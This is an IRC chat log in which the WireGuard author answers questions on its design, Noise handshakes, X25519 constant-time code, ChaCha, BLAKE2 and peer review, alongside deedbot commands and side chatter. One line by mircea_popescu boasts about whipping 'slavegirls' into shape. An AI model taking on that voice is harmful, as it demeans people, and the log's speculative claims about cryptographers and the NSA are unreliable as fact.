system 1796960;1523517272;mircea_popescu;orly ? 1796961;1523517326;ben_vulpes;yeah, they did some really impressive work with fine pipe drawing for the intercooler, and some Black Fucking Magic to keep hell from freezing over 1796962;1523517407;ben_vulpes;basic principle is to dump the heat from intake into the onboard lh2 supply, boil a bit off to turn the pumps, and then cut over to internal supplies once out of the atmosphere. 1796963;1523517452;*;ben_vulpes secretly holds out hope for ssto 1796964;1523517458;mircea_popescu;this magical heat exchanger getting air to -150 should be interesting. 1796965;1523517502;ben_vulpes;why would the intake stream have to get that cold? 1796966;1523517512;mircea_popescu;this is what they spec. 1796967;1523517547;ben_vulpes;ah there it is 1796968;1523517565;ben_vulpes;black magic, i tell you. cold-fusion grade bezzle. 1796969;1523518192;ben_vulpes;http://p.bvulpes.com/pastes/EadTe/?raw=true << either star trek smoke and mirrors or the stuff of boyhood dreams (sabre anti freeze) 1796970;1523518210;ben_vulpes;2015, btw, aviationweek http://aviationweek.com/space/reaction-engines-reveals-secret-sabre-frost-control-technology 1796971;1523518354;mircea_popescu;really, 3d printed thin nozzles ? 1796972;1523518356;mircea_popescu;gimme a break. 1796973;1523521890;ckang;cant get behind all this 3d printer fanboy stuff, its just not a good substrate with the current materials for anything you want to last somewhat longterm 1796974;1523522021;ckang;granted im sure things are progressing, but its hard to outperform something from a billet of aluminum 1796975;1523522064;*;ckang loves well machined aluminum part & high speed milling vids 1796976;1523525881;spyked;http://btcbase.org/log/2017-08-19#1701034 <-- /me now wonders whether e.g. http://btcbase.org/log/2017-08-19#1701034 could have been "illuminated" in any other way than through whipping. it is what it is, isn't it? 1796977;1523525881;a111;Logged on 2017-08-19 18:25 mircea_popescu: are you aware i think your "formal" model is a piece of shit from paragraph one ? 1796978;1523525908;spyked;^ was in re http://btcbase.org/log/2018-04-12#1796675 1796979;1523525908;a111;Logged on 2018-04-12 01:31 mircea_popescu: spyked but why would it be difficult in that way ? 1796980;1523526141;spyked;http://btcbase.org/log/2018-04-12#1796749 <-- that's probably my thing, I've been playing with it for the last two weeks or so, I have it in a loop grabbing feeds from republican blogs. 1796981;1523526141;a111;Logged on 2018-04-12 04:24 mircea_popescu: and in other logs, "CL-Feed-Parser/0.0.00 (SBCL 1.4.5; Linux;" 1796982;1523544474;asciilifeform;attn folx : node zoolag is back in service. 1796983;1523545221;asciilifeform;aaaand a happy cosmonautics day ( http://www.loper-os.org/?p=854 rerun!11 ) to errybody. 1796984;1523546305;asciilifeform;!!up zx2c4 1796985;1523546305;deedbot;zx2c4 voiced for 30 minutes. 1796986;1523546405;asciilifeform;zx2c4: hello ? 1796987;1523546531;asciilifeform;zx2c4: author of 'wireguard' ? 1796988;1523546800;zx2c4;hello. mircea_popescu asked me to come here for two hours to field some questions about wireguard from you all. i'm not very familiar with this channel or the community in it, but i am happy to talk to whomever about wireguard. so let's start the timer now? 1796989;1523546803;zx2c4;hi asciilifeform. 1796990;1523546926;asciilifeform;zx2c4: it so happens that i have a few q: 1796991;1523546934;zx2c4;sure 1796992;1523547044;asciilifeform;zx2c4: how did you select the 'noise' protocol ? 1796993;1523547153;zx2c4;it's small, minimal, has the flexibility to be exactly what i needed and nothing larger. makes conservative choices. fits into the security model i was aiming for with the implementation properties i was looking for. i was also involved with noise from very early on, so several concerns and needs i had with wireguard got factored into noise. and since noise is a very interesting framework, it's now receiving much needed academic attention in 1796994;1523547153;zx2c4;proving it. 1796995;1523547217;zx2c4;are you interested in learning about the security properties i had in mind when designing wireguard? 1796996;1523547227;asciilifeform;yes 1796997;1523547292;zx2c4;wireguard is supposed to be implementable using simple algorithms with as small of a state machine as possible, so that the code size and complexity is kept at a minimum. in otherwords, it aims to be easily auditable so that people can actually read it and feel confident that it doesnt have horrible vulnerabilities. with massive codebases and highly complex designs like openvpn or ipsec, this obviously isnt possible. so with wireguard i was trying 1796998;1523547292;zx2c4;to make something that would make this all possible 1796999;1523547300;zx2c4;then on top of that i wanted a few nice properties: 1797000;1523547340;zx2c4;- silent to unauthorized packets. if you dont know there's a wireguard endpoint there and don't have credentials to talk to it, you can't get it to respond to anything. so, you cant scan for endpoints. this makes it a good thing to put on the outer edge of your network. 1797001;1523547350;zx2c4;- no parsers. fixed length fields only. 1797002;1523547379;zx2c4;- minimal state machine, as mentioned above, which means 1-RTT: if something goes wrong with a message being dropped, the solution is always to just "start over the protocol", since it's only 1-RTT. this saves amazing amounts of complexity 1797003;1523547410;zx2c4;- no dynamic memory allocation. all the memory used by wireguard should be allocated at configuration time, not in response to incoming packets. 1797004;1523547423;zx2c4;- denial of service resistance. as mentioned, you should be able to put this on the outer edge of a network 1797005;1523547441;asciilifeform;'silent to unauthorized packets' is a good thing, and some of the folx here, incl. asciilifeform , are working on systems with this property (e.g. http://btcbase.org/log/2015-01-07#967274 ) 1797006;1523547441;a111;Logged on 2015-01-07 01:22 asciilifeform: with udp, you can make the 'friend or foe?' decision upon receipt of a single (!) packet. 1797007;1523547454;asciilifeform;hence the interest in zx2c4's published item 1797008;1523547464;zx2c4;indeed. i guess you could call the property 'stealthiness' 1797009;1523547492;zx2c4;- extremely simple configuration interface. short base64 25519 pubkeys you can paste around through any means. simple config files. everything happens on the interface level. 1797010;1523547511;zx2c4;- ease of system administration. since its interface-based, things like iptables and whatnot work as you'd expect. 1797011;1523547512;asciilifeform;no-dynamic-allocation is also a Good Thing, for instance in my FFA crypto lib ( http://www.loper-os.org/?cat=49 ) this property exists 1797012;1523547526;zx2c4;asciilifeform: oh cool. i havent seen this ill take a look 1797013;1523547554;asciilifeform;zx2c4: don't go away yet plz. i'd like to ask a few q re your crypto design 1797014;1523547559;zx2c4;- the whole cryptokey routing table thing is very important for making things extremely simple. it pairs the identity of a public key with the ip address someone is allowed to be inside the tunnel. no fancy security marks or whatever from ipsec bloat 1797015;1523547570;zx2c4;asciilifeform: i agreed to stick around for 2 hours. worry not. :P 1797016;1523547571;asciilifeform;zx2c4: why did you select diffie-hellman ? ( vs e.g. rsa ) 1797017;1523547593;zx2c4;ive got some more design properties to enumerate if you'd like, but i can answer your direct questions too 1797018;1523547606;asciilifeform;zx2c4: carry on, but after that let's come back to DH 1797019;1523547650;zx2c4;KEMs like RSA are more complicated to implement in as few round trips as DH-based protocols 1797020;1523547680;zx2c4;- wireguard isn't chatty. when you're not sending traffic, it shuts up and you cant tell its there 1797021;1523547717;asciilifeform;how's that ? you can encipher a symmetric key in an rsagram , and that's 1 packet. then 1 packet back to ack receipt. neh ? 1797022;1523547720;zx2c4;- wireguard doesnt expose any state to the administrator. there's either an interface or there isnt. theres no concept of "connection". with a very simple timer state machine, we're able to completely hide all details from the sender side 1797023;1523547738;zx2c4;so for the handshake we want these properties in 1-RTT: 1797024;1523547747;asciilifeform;( i grasp the connectionless scheme , having prototyped a similar item ) 1797025;1523547773;zx2c4;- authentication in the first message, so that unauthenticated packets arent replied to, hence ensuring things are stealthy 1797026;1523547777;zx2c4;- forward secrecy 1797027;1523547787;zx2c4;- [limited/weak] identity hiding 1797028;1523547797;zx2c4;- key compromise impersonation resistance 1797029;1523547819;asciilifeform;expland please re the latter 1797030;1523547823;asciilifeform;*expand 1797031;1523547836;zx2c4;- key secrecy resilience when 2 of 4 keys, one from each side, are compromised (out of static initiator, static responder, ephemeral initiator, ephemeral responder) 1797032;1523547854;zx2c4;key compromise impersonation is what happens when somebody steals your private key, and then can impersonate anybody else _to_ you 1797033;1523547859;asciilifeform;under what circumstances would 2 / 4 be compromised, but not 4 / 4 ? 1797034;1523547901;zx2c4;for example, when your static longterm keys are compromised, but the ephemeral keys have not been compromised, since they're erased/renewed every 2 minutes 1797035;1523547907;zx2c4;or, conversely, 1797036;1523547927;zx2c4;when the RNG is backdoored, the ephemerals are compromised, but not necessarily the statics 1797037;1523547933;zx2c4;or some combination of the above 1797038;1523547960;asciilifeform;since you mentioned rng : what source of rng does your system use in a typical configuration ? 1797039;1523547977;zx2c4;same source as /dev/urandom 1797040;1523547982;asciilifeform;urandom ?! 1797041;1523547994;zx2c4;in otherwords, the kernel's built-in RNG 1797042;1523547998;asciilifeform;prng 1797043;1523548002;zx2c4;(i've got a project going on right now to rewrite that actually) 1797044;1523548004;zx2c4;yes, csprng 1797045;1523548013;zx2c4;which can take entropy from trngs bla bla 1797046;1523548018;asciilifeform;at any rate, we can come back to this piece 1797047;1523548024;asciilifeform;let's return to DH 1797048;1523548027;zx2c4;sure 1797049;1523548062;zx2c4;another advantage of DH over RSA is that ECDH allows for really short and sweet keys 1797050;1523548070;zx2c4;with relatively simple implementations 1797051;1523548115;asciilifeform;!!up zx2c4 1797052;1523548116;deedbot;zx2c4 voiced for 30 minutes. 1797053;1523548119;zx2c4;our two x25519 C implementations (32bit and 64bit) are actually generated by theorem proving software, so that we're sure they dont contain any errors 1797054;1523548147;asciilifeform;zx2c4: which proving system did you use ? 1797055;1523548162;zx2c4;the 64bit one comes from HACL* 1797056;1523548167;zx2c4;the 32bit one comes from fiat-crypto 1797057;1523548175;zx2c4;fiat-crypto also has a 64bit one, but the HACL* one was faster 1797058;1523548184;zx2c4;https://github.com/mitls/hacl-star 1797059;1523548188;zx2c4;https://github.com/mit-plv/fiat-crypto 1797060;1523548199;zx2c4;HACL* uses F* 1797061;1523548209;zx2c4;fiat-crypto uses Coq 1797062;1523548227;zx2c4;https://www.fstar-lang.org 1797063;1523548227;asciilifeform;let's posit that the proving system itself contains no errors. what classes of error do these systems claim to exclude ? 1797064;1523548232;zx2c4;https://coq.inria.fr 1797065;1523548256;zx2c4;things like integer overflow, or general arithmetic errors 1797066;1523548264;zx2c4;carry bugs 1797067;1523548268;zx2c4;also, constant time 1797068;1523548280;asciilifeform;how is the latter guaranteed ? 1797069;1523548299;asciilifeform;i.e. , if i disasm your .o , will i see 0 conditional jumps ? 1797070;1523548300;zx2c4;by only using a limited subset of constructs which are known to be constant time 1797071;1523548310;zx2c4;yes, there are no conditional jumps 1797072;1523548319;asciilifeform;anywhere ? or in particular routines ? 1797073;1523548338;zx2c4;our discussion of HACL* and fiat-crypto pertains to the two C implementations of x25519 1797074;1523548353;zx2c4;ill show you the code 1797075;1523548357;zx2c4;it looks... quite strange 1797076;1523548359;zx2c4;since its machine generated 1797077;1523548368;asciilifeform;out of curiosity, how big is the typical built binary for this library ? ( say, on amd64 ) 1797078;1523548383;zx2c4;https://git.zx2c4.com/WireGuard/tree/src/crypto/curve25519-fiat32.h 1797079;1523548383;zx2c4;https://git.zx2c4.com/WireGuard/tree/src/crypto/curve25519-hacl64.h 1797080;1523548385;asciilifeform;if i want to hand-audit it, say. 1797081;1523548408;zx2c4;you mean if you just wanted to hand audit the .o that comes out of this? 1797082;1523548411;asciilifeform;correct 1797083;1523548420;zx2c4;not very big at all 1797084;1523548427;zx2c4;i can check for you one sec 1797085;1523548465;asciilifeform;btw zx2c4 , i must regret to inform you that the code you linked, is in fact NOT constant-time on several common architectures, because it makes use of machine MUL instruction ( gcc will compile a nonconstant-operanded '*' to e.g. IMUL on x86 ) 1797086;1523548493;asciilifeform;http://btcbase.org/log/2018-02-17#1784243 << see e.g. this discussion. 1797087;1523548493;a111;Logged on 2018-02-17 04:22 asciilifeform: mod6: i will share my current hypothesis : all current intels have MUL leakage 1797088;1523548526;zx2c4; https://data.zx2c4.com/curve25519-from-hacl-for-asciilifeform.o 1797089;1523548547;asciilifeform;ppc, arm7, older intels ( e.g. 486, celeron ), and possibly new intels , all have variant-timed IMUL 1797090;1523548570;asciilifeform;41 kB, notbad 1797091;1523548623;zx2c4;https://א.cc/wrlf5K8I voila 1797092;1523548634;trinque;wtf? 1797093;1523548643;zx2c4;haha deedbot doesnt like utf8 URLs 1797094;1523548648;zx2c4;found a vuln! 1797095;1523548654;zx2c4;does that entitle me to deedbot btc? 1797096;1523548658;trinque;mmnope. 1797097;1523548662;shinohai;!~weather 1797098;1523548663;jhvh1;stormy with a chance of packeting 1797099;1523548663;zx2c4;alas 1797100;1523548674;asciilifeform;zx2c4: phf has been fiddling with the thing's uniturd processing of late; prolly introduced bug 1797101;1523548675;trinque;utf8 works just fine 1797102;1523548687;trinque;asciilifeform: phf has been fiddling with deedbot? 1797103;1523548703;asciilifeform;aaa lol nm 1797104;1523548705;zx2c4;asciilifeform: i haven't been able to observe any non-constant time multiplications on intel in that code 1797105;1523548737;zx2c4;if you've found an architecture attack though, please do publicise it. that sounds like it could be some really great security attack work. 1797106;1523548740;asciilifeform;zx2c4: to observe it, you will have to hand-emplace rdtsc around it , and run on properly doctored inputs 1797107;1523548750;asciilifeform;zx2c4: this particular architectural sadness is not my discovery 1797108;1523548757;asciilifeform;it has been common knowledge for some years 1797109;1523548783;asciilifeform;discussed, for instance, in https://bearssl.org/ctmul.html 1797110;1523548790;asciilifeform;( complete with list of known-to-be-sad chips ) 1797111;1523548850;zx2c4;looks like intel is basically fine? 1797112;1523548881;zx2c4;i dont own any via 2000 hardware to test on 1797113;1523548940;asciilifeform;zx2c4: most of the currently-sold intels are ok re : imul. arm, however, is not 1797114;1523548986;zx2c4;looks like 7T and 9T have issues. nice chart 1797115;1523549066;zx2c4;if you're interested in crypto primitives in wireguard in general, i can give you an overview of our implementations. the hacl and fiat code is not the only code we have in there 1797116;1523549080;asciilifeform;zx2c4: i've spent the past ~2yrs writing a properly constant-time arithmetic lib. it is being slowly published. ( see earlier link to my www ) 1797117;1523549095;asciilifeform;but i have a somewhat different approach, which i call 'fits in head' 1797118;1523549142;zx2c4;oh? 1797119;1523549155;asciilifeform;!#s fits in head 1797120;1523549155;a111;219 results for "fits in head", http://btcbase.org/log-search?q=fits%20in%20head 1797121;1523549193;asciilifeform;( or see the ffa article series, http://www.loper-os.org/?cat=49 , currently on sabbatical but due to resume after i come back from upcoming biznistrip ) 1797122;1523549210;asciilifeform;but let's come back to your product, zx2c4 : 1797123;1523549218;zx2c4;project* 1797124;1523549224;asciilifeform;project 1797125;1523549257;asciilifeform;how did you settle on the use of bernsteinian cryptoprimitives ( e.g. chacha ) ? 1797126;1523549287;zx2c4;chachapoly is well understood and is fast on nearly all hardware 1797127;1523549303;zx2c4;its also easy to implement and simple 1797128;1523549317;zx2c4;aes is also well understood, but is neither easy to implement, simple, nor fast on all hardware 1797129;1523549416;asciilifeform;zx2c4: does it bother you that no proof of strength for any symmetric cipher other than otp (e.g. aes, chacha, etc ) exists ? 1797130;1523549449;zx2c4;not anymore than other things in cryptography worry me 1797131;1523549452;asciilifeform;( i.e. a reduction to np-hard or for that matter ANY particular complexity class ) 1797132;1523549553;zx2c4;things like RSA boil down to number theory problems. but that's in a sense scarier than the set of problems that good block ciphers tend to boil down to. because it means that those primitives have lots of _structure_, and generally structure is something that can be exploited. just look at all the amazing and fantastic attacks on things with structure. so just boiling down to a [currently considered] "hard problem" doesn't provide as much solace 1797133;1523549553;zx2c4;as you'd hope 1797134;1523549574;asciilifeform;sadly enough, there is not, as of my last look, a proof that rsa reduces to hardness-of-Factoring 1797135;1523549582;asciilifeform;so it suffers from similar problem. 1797136;1523549610;zx2c4;but even hardness of factoring... how hard is this actually? what number theoretic advances are right around the corner? 1797137;1523549630;zx2c4;so anyway, im less concerned about symmetric cryptography than other things 1797138;1523549645;asciilifeform;when i ask for 'reduces to nphard', obviously i cannot mean 'factoring', because its hardness is not proven 1797139;1523549649;asciilifeform;conceivably factoring is in P. 1797140;1523549665;zx2c4;seems like there are many places and interesting ways to optimize at this point. lots of neat creative work coming out. but that with aes and whatnot, we're in a pretty good place in terms of symmetric crypto 1797141;1523549682;asciilifeform;several yrs ago i went in search of ~any~ problem that can be shown to have a ~nphard average case~ . and found none. 1797142;1523549706;zx2c4;shape packing? 1797143;1523549732;asciilifeform;afaik no proof of hard-average-case exists for it 1797144;1523549740;zx2c4;interesting 1797145;1523549746;asciilifeform;or for anything else. 1797146;1523549757;asciilifeform;it's a 1) open problem 2) afaik nobody is publicly working on 1797147;1523549802;zx2c4;are you skeptical of djb primitives? wondering with what motivation came that question? 1797148;1523549832;asciilifeform;i am skeptical of all symmetric ciphers and hashes, given as there exists no scientific basis for considering any of them to be actually strong. 1797149;1523549851;asciilifeform;but of djb's in particular, their sudden popularity in past few yrs also has no satisfying explanation imho. 1797150;1523549884;zx2c4;theyre simple and fast on all hardware, and he came up with an api for using them that many developers like to use (the nacl stuff) 1797151;1523549896;zx2c4;i'm pretty sure there's no conspiracy 1797152;1523549901;asciilifeform;rc4 was also 'simple and fast'... 1797153;1523549909;asciilifeform;and rot13 even faster 1797154;1523549928;asciilifeform;!!up zx2c4 1797155;1523549929;deedbot;zx2c4 voiced for 30 minutes. 1797156;1523549929;zx2c4;i'd be surprised to see all 20 rounds of chacha broken 1797157;1523549943;asciilifeform;but to move on from this item : zx2c4 how did you select 'blake2' hashing system ? 1797158;1523549965;zx2c4;similar criteria - well understood, simple to implement, fast on nearly all hardware 1797159;1523550027;zx2c4;its core is basically chacha ;-) 1797160;1523550037;asciilifeform;md5 was also fast and simple... 1797161;1523550053;zx2c4;you know hmac-md5 still isnt broken 1797162;1523550074;zx2c4;(noise uses blake with hkdf, which internally uses hmac) 1797163;1523550084;zx2c4;blake is also faster than md5 which is nice 1797164;1523550103;zx2c4;but anyway, the world has learned quite a bit since md5 1797165;1523550119;zx2c4;blake2 came from blake which went through the sha3 contest as a finalist 1797166;1523550129;zx2c4;so it's received quite a bit of scrutiny 1797167;1523550141;asciilifeform;i don't see 'not publicly smashed to bits of just yet' as a proof of strength, given as it is true of literally every system ever devised, until the moment of public breakage 1797168;1523550175;zx2c4;i dont think hmac-md5 is anywhere near broken, actually. 1797169;1523550183;zx2c4;not saying anyone should use it but 1797170;1523550192;zx2c4;its in a much better place than just raw md5 1797171;1523550202;asciilifeform;since mentioned scrutiny : on www of 'wireguard', there is mention of 'reviewed by cryptographers' . may i ask, who reviewed ? 1797172;1523550207;asciilifeform;are the reviews published somewhere ? 1797173;1523550228;zx2c4;the paper was peer reviewed for NDSS'17 1797174;1523550235;asciilifeform;is it on www ? 1797175;1523550247;asciilifeform;and the reviews themselves, also ? 1797176;1523550250;zx2c4;yea usually there's lots of information on the conference and board and whatnot 1797177;1523550259;asciilifeform;happen to have a link handy ? 1797178;1523550273;zx2c4;i dont think they post the reviews? except that it was "accepted" to the conference 1797179;1523550286;asciilifeform;i'm curious, for instance, whether any of the cryptographers observed that the arithmetical routines behind your ecc are not in fact constant time on e.g. arm. 1797180;1523550308;zx2c4;then in the acknowledgement of the paper, a few others arementioned who reviewed it while it was being written 1797181;1523550321;asciilifeform;zx2c4: so it is not possible currently for me to learn , which cryptographers reviewed, and what they had said ? 1797182;1523550322;zx2c4;and then since several other colleagues and cryptographers have reviewed the system favorably 1797183;1523550342;asciilifeform;any possibility to see who ? 1797184;1523550342;zx2c4;i havent compiled a list of Name+WrittenReview. maybe i should do that 1797185;1523550362;zx2c4;seems like lots of things these days have testimonials 1797186;1523550374;asciilifeform;i'm less interested in 'testimonials', and more in re criticisms 1797187;1523550383;zx2c4;ahh 1797188;1523550389;mircea_popescu;o hey there zx2c4 1797189;1523550391;asciilifeform;but it so happens that i in particular do not think much of the work of current 'pro cryptographers'. 1797190;1523550394;mircea_popescu;!!key zx2c4 1797191;1523550394;deedbot;Not registered. 1797192;1523550397;zx2c4;hello mircea_popescu 1797193;1523550401;zx2c4;we've been going at it for a while here 1797194;1523550404;mircea_popescu;zx2c4 do me a favour and !!register your key 1797195;1523550410;zx2c4;i tried registering my key privately to deedbot but it didnt respond 1797196;1523550414;zx2c4;ill try it in public here instead 1797197;1523550417;mircea_popescu;please do 1797198;1523550423;zx2c4;!!register https://www.zx2c4.com/keys/AB9942E6D4A4CFC3412620A749FC7012A5DE03AE.asc 1797199;1523550429;asciilifeform;zx2c4: i'ma leave the rest of the session to mircea_popescu , owner of this chan, and my co-author in e.g. the FUCKGOATS auditable trng, https://archive.is/CGQkR ) 1797200;1523550444;mircea_popescu;did you two come to blows ? 1797201;1523550456;zx2c4;mircea_popescu: no, thought it was quite productive actually 1797202;1523550463;asciilifeform;mircea_popescu: lol notyet, i did the 'civilized' thing as you suggested. 1797203;1523550474;mircea_popescu;zx2c4 the tls fails i bet. 1797204;1523550481;zx2c4;asciilifeform: oh, okay. im happy to keep going though. and if you want to be uncivilized, ill gladly accept any harshness you want to throw my way. i dont scare easilyt 1797205;1523550568;zx2c4;!!register http://keyserver.ubuntu.com:11371/pks/lookup?op=get&search=0xAB9942E6D4A4CFC3412620A749FC7012A5DE03AE 1797206;1523550573;deedbot;AB9942E6D4A4CFC3412620A749FC7012A5DE03AE registered as zx2c4. 1797207;1523550577;mircea_popescu;win. 1797208;1523550604;mircea_popescu;!!rate zx2c4 1 j. a. donenfeld, wireguard guy. 1797209;1523550607;deedbot;Get your OTP: http://p.bvulpes.com/pastes/HxKbS/?raw=true 1797210;1523550610;mircea_popescu;!!pay zx2c4 1 1797211;1523550615;deedbot;Get your OTP: http://p.bvulpes.com/pastes/94ISz/?raw=true 1797212;1523550655;mircea_popescu;zx2c4 you understand how the logs work btw ? 1797213;1523550677;zx2c4;no, not at all. im also not quite sure what to do with these pgp encrypted blobs i cant decrypt 1797214;1523550699;asciilifeform;zx2c4: they're for mircea_popescu to decrypt; it makes the command go. 1797215;1523550708;zx2c4;oh, gotcha 1797216;1523550710;mircea_popescu;they are not for you ; they are for me. deedbot works an otp verification model -- you tell it to do whatever youwant, it asks you to prove you own the key, if you do it does it. 1797217;1523550711;zx2c4;makes more sense 1797218;1523550718;asciilifeform;zx2c4: he just threw a whole bitcoin into your piggy. 1797219;1523550727;zx2c4;horrah! thanks 1797220;1523550734;asciilifeform;zx2c4: which you can withdraw using deedbot at your leisure 1797221;1523550738;mircea_popescu;now let's look at the logs : 1797222;1523550745;mircea_popescu;http://btcbase.org/log/2018-04-12#1797221 1797223;1523550745;a111;Logged on 2018-04-12 16:32 mircea_popescu: now let's look at the logs : 1797224;1523550765;mircea_popescu;you can click the link and see a website-based story of the log ; the bot also reads the line referenced in conversation. 1797225;1523550790;zx2c4;if you guys wind up using wireguard for part of your infra and want to support wireguard for a year, i'm always looking for large donations, etc. not sure if that's what deedbot is for exactly but that would be quite the nice deed 1797226;1523550795;mircea_popescu;this is a lot more than meets the eye ; because it actually restructures conversations into a tree. things here have a depth not encountered anywhere else. 1797227;1523550801;zx2c4;interesting 1797228;1523550836;mircea_popescu;the deed in deedbot comes from the republican system for registration of deeds. think of it as your county clerk, you can go to him to register your wedding or business or w/e. 1797229;1523550855;zx2c4;O_o 1797230;1523550870;zx2c4;neat 1797231;1523550877;mircea_popescu;http://deedbot.org/ << on deedbot you can register any arbitrary item ; it keeps a record that indeed your signature did so ; and it marks the time, through inclusion in the bitcoin blockchain 1797232;1523550891;mircea_popescu;so it permits indefeasible record of deeds ; something the fiat sovereigns have not yet managed. 1797233;1523550914;zx2c4;!!withdraw 1 1ASnTs4UjXKR8tHnLi9yG42n42hbFYV2um 1797234;1523550917;zx2c4;lets see if that works 1797235;1523550921;deedbot;Get your OTP: http://p.bvulpes.com/pastes/ApNfb/?raw=true 1797236;1523550922;zx2c4;im guessing deedbot will send me a otp now 1797237;1523550923;zx2c4;voila 1797238;1523550932;mircea_popescu;zx2c4 mind that transfers are not instantaneous. 1797239;1523550937;mircea_popescu;so it may need a few. 1797240;1523550945;mircea_popescu;there's also !!balance and !!ledger, and besides 1797241;1523550946;mircea_popescu;!!help 1797242;1523550947;deedbot;http://deedbot.org/help.html 1797243;1523550974;zx2c4;!!v 613368773AD31E2D4F1A68F8F740BE5AE18F5C46924FB8C9C3CC2084E52C6D4D 1797244;1523550978;mircea_popescu;!!rate ckang 2 diplomatic agent o.O 1797245;1523550981;deedbot;Get your OTP: http://p.bvulpes.com/pastes/JHIsH/?raw=true 1797246;1523550993;zx2c4;i wonder if that verification worked i just posted 1797247;1523551025;mircea_popescu;i think if you have not enough in your wallet it drops it silently ; and if the payment's not processed yet you might have nothing in your wallet yet. 1797248;1523551041;zx2c4;interesting 1797249;1523551063;zx2c4;well, feel free to keep filling up my wallet, say, with thousands of coins O_o 1797250;1523551098;mircea_popescu;lol. 1797251;1523551153;mircea_popescu;http://btcbase.org/log/2018-04-12#1796973 << ahaha jesus christ check him out, he gets it natively! 1797252;1523551153;a111;Logged on 2018-04-12 08:31 ckang: cant get behind all this 3d printer fanboy stuff, its just not a good substrate with the current materials for anything you want to last somewhat longterm 1797253;1523551187;mircea_popescu;http://btcbase.org/log/2018-04-12#1796974 << yes dood, sintering is a joak in terms of material strength and high performance generally. 1797254;1523551187;a111;Logged on 2018-04-12 08:33 ckang: granted im sure things are progressing, but its hard to outperform something from a billet of aluminum 1797255;1523551249;mircea_popescu;speaking of which and ben_vulpes boyhood dreams, ssto and so on : i dreamt last night that someone actually managed to create that true wunderwaffen material, the composite/ceramic with higher tensile strength than steel, but negligible caloric conductivity. making some iiiincredible jet engines. 1797256;1523551342;mircea_popescu;http://btcbase.org/log/2018-04-12#1796976 << you know me. he doesn't know you. this makes all the difference in the world -- i can whip my slavegirls into shape because they ~love me~. people without this benefit are stuck going at snail speed, which is why "education" in the unsexualized way it's implemented publicly does not work. it couldn't fucking work. 1797257;1523551342;a111;Logged on 2018-04-12 09:38 spyked: http://btcbase.org/log/2017-08-19#1701034 <-- /me now wonders whether e.g. http://btcbase.org/log/2017-08-19#1701034 could have been "illuminated" in any other way than through whipping. it is what it is, isn't it? 1797258;1523551371;mircea_popescu;http://btcbase.org/log/2018-04-12#1796980 << sweet! 1797259;1523551371;a111;Logged on 2018-04-12 09:42 spyked: http://btcbase.org/log/2018-04-12#1796749 <-- that's probably my thing, I've been playing with it for the last two weeks or so, I have it in a loop grabbing feeds from republican blogs. 1797260;1523551422;*;asciilifeform has 1 more q for zx2c4 , after mircea_popescu finishes 1797261;1523551425;zx2c4;well im still around here for another half hour or so, so feel free to lob anything more at me 1797262;1523551427;zx2c4;oh good, okay 1797263;1523551430;mircea_popescu;asciilifeform by all means, go ahead. 1797264;1523551436;mircea_popescu;i have to read your previous convo. 1797265;1523551449;asciilifeform;zx2c4: are you the author of 'noise' protocol ? 1797266;1523551460;asciilifeform;( co-author ? ) 1797267;1523551477;asciilifeform;the q , then : why does 'noise' include a null-cipher mode ? 1797268;1523551479;zx2c4;Noise is from Trevor Perrin. I've been very involved in contributing to the project though (i mentioned at the end of the specification) 1797269;1523551492;zx2c4;a null cipher mode? it doesnt... 1797270;1523551494;mircea_popescu;http://btcbase.org/log/2018-04-12#1796991 << let me ask you this then : why do you send an encrypted empty message when heartbeat fails ? 1797271;1523551494;a111;Logged on 2018-04-12 15:28 zx2c4: sure 1797272;1523551504;mircea_popescu;alf trying to poach my question :D 1797273;1523551516;asciilifeform;zx2c4: do i misread ? because in the spec, 'No confidentiality. This payload is sent in cleartext.' ( http://www.noiseprotocol.org/noise.html#message-format section 7.4 ) 1797274;1523551524;asciilifeform;seems that it does. 1797275;1523551572;zx2c4;oh, that's not quite what that's about 1797276;1523551584;zx2c4;noise defines several different handshakes 1797277;1523551590;zx2c4;wireguard uses Noise_IKpsk2 1797278;1523551596;zx2c4;which is 1-RTT 1797279;1523551601;zx2c4;but there are other noise handshakes 1797280;1523551605;mircea_popescu;http://btcbase.org/log/2018-04-12#1797002 << this is fucking grand. i love reading through this list, it's in the vein of "oh my god, check that out, he natively gets it!" 1797281;1523551605;a111;Logged on 2018-04-12 15:36 zx2c4: - minimal state machine, as mentioned above, which means 1-RTT: if something goes wrong with a message being dropped, the solution is always to just "start over the protocol", since it's only 1-RTT. this saves amazing amounts of complexity 1797282;1523551608;zx2c4;0-RTT, 1-RTT, 2-RTT, and so forth 1797283;1523551618;mircea_popescu;zx2c4 don't break up your sentences in multi lines, we read everything anyway. 1797284;1523551622;zx2c4;oh, okay 1797285;1523551645;asciilifeform;zx2c4: granted, but it would appear that the orig spec of 'noise' permits null-ciphering, just like the nsa-authored ssl/tls. 1797286;1523551651;asciilifeform;this does not bother you ? 1797287;1523551675;asciilifeform;( see also http://btcbase.org/log/2018-04-11#1796297 ) 1797288;1523551675;a111;Logged on 2018-04-11 16:11 asciilifeform: mircea_popescu: picture if the selector on kalash had a 'fires backwards' position. 1797289;1523551691;zx2c4;noise defines several different handshakes. wireguard uses Noise_IKpsk2, which is 1-RTT. But there are other noise handshakes, some of which are 0-RTT, 1-RTT, 2-RTT, 1.5-RTT, and so forth. each handshake message can optionally contain a payload -- to contain things like, say, certificates or other data. the question is at which stage of the handshake do you use the payload parameter? if you do it too early in some, you get zero confidentiality. so 1797290;1523551691;zx2c4;this is spelled out explicitly in the section you mentiond 1797291;1523551715;zx2c4;but there's certainly not any "null-ciphering" and this is only a misunderstanding of what the specification says 1797292;1523551724;asciilifeform;i understand the bare fact, zx2c4 . my question is, why do you think the protocol author permitted an unsecured mode as a valid mode of operation ? 1797293;1523551730;asciilifeform;what's the justification, for permitting it at all 1797294;1523551738;asciilifeform;!!up zx2c4 1797295;1523551739;deedbot;zx2c4 voiced for 30 minutes. 1797296;1523551742;zx2c4;its not an "unsecured mode" because this isnt a "mode" 1797297;1523551755;mircea_popescu;zx2c4 you can voice yourself (permanently) by saying !!up to deedbot ; saves us the trouble. 1797298;1523551757;asciilifeform;it appears to be a valid state of the state machine. else why would it be mentioned in the spec. 1797299;1523551762;zx2c4;!!up 1797300;1523551765;deedbot;Get your OTP: http://p.bvulpes.com/pastes/LgTad/?raw=true 1797301;1523551777;zx2c4;!!v CFFE7CEB6795F523B137AA9A9B0C8A20024FF0EED10EEF7C649C81591CF9DDE1 1797302;1523551778;deedbot;You are now voiced in #trilema 1797303;1523551779;asciilifeform;zx2c4: generally you will say !!up to deedbot in pm 1797304;1523551786;asciilifeform;( when initially connected to fleanode ) 1797305;1523551795;zx2c4;sorry, new here ;-) 1797306;1523551799;mircea_popescu;dun worry. 